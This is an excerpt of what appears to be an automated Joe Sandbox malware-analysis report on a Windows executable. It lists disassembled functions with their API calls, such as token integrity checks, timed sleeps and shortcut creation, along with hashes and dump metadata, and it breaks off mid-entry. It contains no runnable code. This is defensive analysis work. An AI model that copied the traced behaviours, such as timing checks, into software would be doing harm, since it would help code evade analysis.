                                                      • Opcode Fuzzy Hash: a03b8da5e6747138a1970dec03b98b2f6b1256698c9753e0dc33273ab6937981
                                                      • Instruction Fuzzy Hash: F011E1B2908288BFC711ABA89C48F9B7BACEB49320F15436DF915D7290DA758D4187A0
                                                      Function 00AB874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AB8766
                                                      • GetLastError.KERNEL32(?,00AB822A,?,?,?), ref: 00AB8770
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00AB822A,?,?,?), ref: 00AB877F
                                                      • HeapAlloc.KERNEL32(00000000,?,00AB822A,?,?,?), ref: 00AB8786
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AB879D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: ecd0db6ff074f2f2b1afd353a270337cf1bb37b521443dd401f5422868296730
                                                      • Instruction ID: 0e4558556ced749b1a4990e2cc5cc6d73cda1dd6277043872fda54f8975f71f5
                                                      • Opcode Fuzzy Hash: ecd0db6ff074f2f2b1afd353a270337cf1bb37b521443dd401f5422868296730
                                                      • Instruction Fuzzy Hash: 1C016271200284FFDB108FA9DC88DA77B6CFF863557200539F949C6160DE318C41CB60
                                                      Function 00AC54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC5502
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AC5510
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC5518
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AC5522
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC555E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: e1af6516112815b21a4a468a4bbd75de896385c295c457761ac7c0b18e292ed0
                                                      • Instruction ID: 6b916a49c97dc1e99e75479cadecb96e486baab2fbf23a8a361b24544684e7cb
                                                      • Opcode Fuzzy Hash: e1af6516112815b21a4a468a4bbd75de896385c295c457761ac7c0b18e292ed0
                                                      • Instruction Fuzzy Hash: CB015B35D00A1DDBCF00EFF9E988AEDBB79FB09701F41015AEA01B6240DB316590C7A1
                                                      Function 00AB7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?,?,00AB799D), ref: 00AB766F
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?), ref: 00AB768A
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?), ref: 00AB7698
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?), ref: 00AB76A8
                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?), ref: 00AB76B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: e7cf4377d421cbf65ce9aaf5c09a8ff867c9b34168af30596d60280115a22e15
                                                      • Instruction ID: 7f971b8cc5cbebac1af96cf597b35482e715cb097e60d7b95561bbc80d7d201d
                                                      • Opcode Fuzzy Hash: e7cf4377d421cbf65ce9aaf5c09a8ff867c9b34168af30596d60280115a22e15
                                                      • Instruction Fuzzy Hash: 4A018472601604BFDB119F58DC84BEE7BADEB84751F144028FD04D6212E772DE419BA0
                                                      Function 00AB85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AB8608
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AB8612
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AB8621
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AB8628
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AB863E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: ad7a678fa471ec369cf02287f8c97a1d0555d9f59c04398449617ac435ebd6dc
                                                      • Instruction ID: 8a153095655fcfde13675d25e032f888f4b89299145ce2788b09dc54bcba5d05
                                                      • Opcode Fuzzy Hash: ad7a678fa471ec369cf02287f8c97a1d0555d9f59c04398449617ac435ebd6dc
                                                      • Instruction Fuzzy Hash: 13F04F31201244AFEB104FE9DCD9EAB3BACEF8AB54F044529F945CA191EB659C42DB60
                                                      Function 00AB8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AB8669
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8673
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8682
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8689
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB869F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: eab382f301bb475bb1a7de0fe26e0b599db55207f77de63ffc3bf5dc34944bff
                                                      • Instruction ID: 88c0c702be7e31c220ccc232994a58246b197026e075fc7debb3940fbe55c6a0
                                                      • Opcode Fuzzy Hash: eab382f301bb475bb1a7de0fe26e0b599db55207f77de63ffc3bf5dc34944bff
                                                      • Instruction Fuzzy Hash: F3F04471200284AFD7115FA5DCD8EA73BACEF85754F100125F545CA161DA759D41DB60
                                                      Function 00ABC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ABC6BA
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ABC6D1
                                                      • MessageBeep.USER32(00000000), ref: 00ABC6E9
                                                      • KillTimer.USER32(?,0000040A), ref: 00ABC705
                                                      • EndDialog.USER32(?,00000001), ref: 00ABC71F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: df49d618a0a94bad394c64ff599ce12199efd2b91be55c4062d223a27285b8ae
                                                      • Instruction ID: 4de0a03962d5f6b07653436a7e5cb1c559503d14d952ff44a2361e051e623374
                                                      • Opcode Fuzzy Hash: df49d618a0a94bad394c64ff599ce12199efd2b91be55c4062d223a27285b8ae
                                                      • Instruction Fuzzy Hash: 69016D30500744ABEB219B60DD9EFA677BCFF00715F000669F686A54E2EBF0A9958F80
                                                      Function 00A613B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 00A613BF
                                                      • StrokeAndFillPath.GDI32(?,?,00A9BAD8,00000000,?), ref: 00A613DB
                                                      • SelectObject.GDI32(?,00000000), ref: 00A613EE
                                                      • DeleteObject.GDI32 ref: 00A61401
                                                      • StrokePath.GDI32(?), ref: 00A6141C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 3d9aae17178fda043db429767fd448d333b2db9b3744372d5290a4c8b30512d1
                                                      • Instruction ID: c5b0479cdd54d1bc1fb74cd504a34d88dbd49b005a1a6c9b6e0e48719937a1df
                                                      • Opcode Fuzzy Hash: 3d9aae17178fda043db429767fd448d333b2db9b3744372d5290a4c8b30512d1
                                                      • Instruction Fuzzy Hash: EEF0C970004248EFDB259F66EC4D7683FB4E715326F08C226E5294E1F1DB354996DF50
                                                      Function 00ACC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00ACC69D
                                                      • CoCreateInstance.OLE32(00AF2D6C,00000000,00000001,00AF2BDC,?), ref: 00ACC6B5
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                      • CoUninitialize.OLE32 ref: 00ACC922
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                      • String ID: .lnk
                                                      • API String ID: 2683427295-24824748
                                                      • Opcode ID: c6157efdf9b413efb4acbe821180dfae31c5d3ecff4f03a3c4d5543e21904cd7
                                                      • Instruction ID: 0def20460a520045f6c03a2ca1babb7aac6c44e019f7ece18c0fb2944c610c9b
                                                      • Opcode Fuzzy Hash: c6157efdf9b413efb4acbe821180dfae31c5d3ecff4f03a3c4d5543e21904cd7
                                                      • Instruction Fuzzy Hash: 0AA14A71108205AFD700EF64C991EABB7FCEF94754F04491CF1969B1A2EB70EA09CB52
                                                      Function 00A72E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A80FF6: std::exception::exception.LIBCMT ref: 00A8102C
                                                        • Part of subcall function 00A80FF6: __CxxThrowException@8.LIBCMT ref: 00A81041
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00A67BB1: _memmove.LIBCMT ref: 00A67C0B
                                                      • __swprintf.LIBCMT ref: 00A7302D
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A72EC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 1943609520-557222456
                                                      • Opcode ID: 05b633ccb4db4dc6f2413241fbf9d66618aa55869a2f6149a8c8815d0741d8fb
                                                      • Instruction ID: c6792d350597dec5a78065a1b587b6c3f95ef350a7ebffb6f4d53d20df443319
                                                      • Opcode Fuzzy Hash: 05b633ccb4db4dc6f2413241fbf9d66618aa55869a2f6149a8c8815d0741d8fb
                                                      • Instruction Fuzzy Hash: D29179725183019FCB28EF24DE95C6EB7B8EF85740F04891DF4969B2A1DB20EE45CB52
                                                      Function 00ACBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A648A1,?,?,00A637C0,?), ref: 00A648CE
                                                      • CoInitialize.OLE32(00000000), ref: 00ACBC26
                                                      • CoCreateInstance.OLE32(00AF2D6C,00000000,00000001,00AF2BDC,?), ref: 00ACBC3F
                                                      • CoUninitialize.OLE32 ref: 00ACBC5C
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                      • String ID: .lnk
                                                      • API String ID: 2126378814-24824748
                                                      • Opcode ID: 52d06229d97e5ee7775f95d9fedc7c84cdbe7710197984a1507d962db8cfe653
                                                      • Instruction ID: 597d864ccfb29478d76ec1151e4a4d82c825b49f54bd8dca5284d0a69a86f397
                                                      • Opcode Fuzzy Hash: 52d06229d97e5ee7775f95d9fedc7c84cdbe7710197984a1507d962db8cfe653
                                                      • Instruction Fuzzy Hash: 0BA112756042019FCB10DF14C985E6ABBF5FF88314F15899CF89A9B2A1CB32ED45CBA1
                                                      Function 00A8524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00A852DD
                                                        • Part of subcall function 00A90340: __87except.LIBCMT ref: 00A9037B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      • Opcode ID: 4af7bdad867834d3a3ea76951d5b42962a7ec0d4fc9238368f3d6f198a8e3f44
                                                      • Instruction ID: 2e078975b8cbfc83de0537a12b267656c6bfd81ff5c10c06181ad661c311f9a1
                                                      • Opcode Fuzzy Hash: 4af7bdad867834d3a3ea76951d5b42962a7ec0d4fc9238368f3d6f198a8e3f44
                                                      • Instruction Fuzzy Hash: B9515831F1CA018BCF11B774CA517BE2BE4DB40790F208968E8D58A2E5EE748CD5DB42
                                                      Function 00A8023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #$+
                                                      • API String ID: 0-2552117581
                                                      • Opcode ID: 531ea843d79c8f7d54ccfac1df314aba882898dbbdc00e1ceb7fc13623e32f79
                                                      • Instruction ID: 88fdb5a5ce6d042f72873a3dcb7793a1f66ee49056bdc8b2063631a43a92ff4b
                                                      • Opcode Fuzzy Hash: 531ea843d79c8f7d54ccfac1df314aba882898dbbdc00e1ceb7fc13623e32f79
                                                      • Instruction Fuzzy Hash: 8F5131759046468FDF25EF38C488BFA7BB8EF2A310F140155E8919F2A2D7349C46CB60
                                                      Function 00A762F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memset$_memmove
                                                      • String ID: ERCP
                                                      • API String ID: 2532777613-1384759551
                                                      • Opcode ID: f0ba33ba4b1d90e08841a72e0b8e3dd75641848561134e3b355f81f8a14512ab
                                                      • Instruction ID: e0be78f76fa3f12a75a62725f0b5e90d97f7ad242f92e71ba79a2c9e2c1e1b43
                                                      • Opcode Fuzzy Hash: f0ba33ba4b1d90e08841a72e0b8e3dd75641848561134e3b355f81f8a14512ab
                                                      • Instruction Fuzzy Hash: 2B5191719007099BDB24CF65C991BEABBF8EF04714F20C56EE54ECB241E7719684CB50
                                                      Function 00AE7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00AEF910,00000000,?,?,?,?), ref: 00AE7C4E
                                                      • GetWindowLongW.USER32 ref: 00AE7C6B
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AE7C7B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 28f3f3ccab43222421d8ff677843b7dde4ceaf98103c41dbbfdaef7425985188
                                                      • Instruction ID: 049175edd0a2955a56536c249c855961cf4a3fef61ead64d91dcb2de293074ad
                                                      • Opcode Fuzzy Hash: 28f3f3ccab43222421d8ff677843b7dde4ceaf98103c41dbbfdaef7425985188
                                                      • Instruction Fuzzy Hash: FF31BE31204685AFDB119F39DC45BEA77A9EB45324F244725F875932E0C731E8519B60
                                                      Function 00AE7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AE76D0
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AE76E4
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AE7708
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: 6e4ac723545c6c3e44b0a9abb3a54cf6415ddedaeddb89bf852d5a8fb07e1e7d
                                                      • Instruction ID: 470c1b3e8548722544df243e0f7f3d11020b83f598eb4ec2364c00ed57c2235e
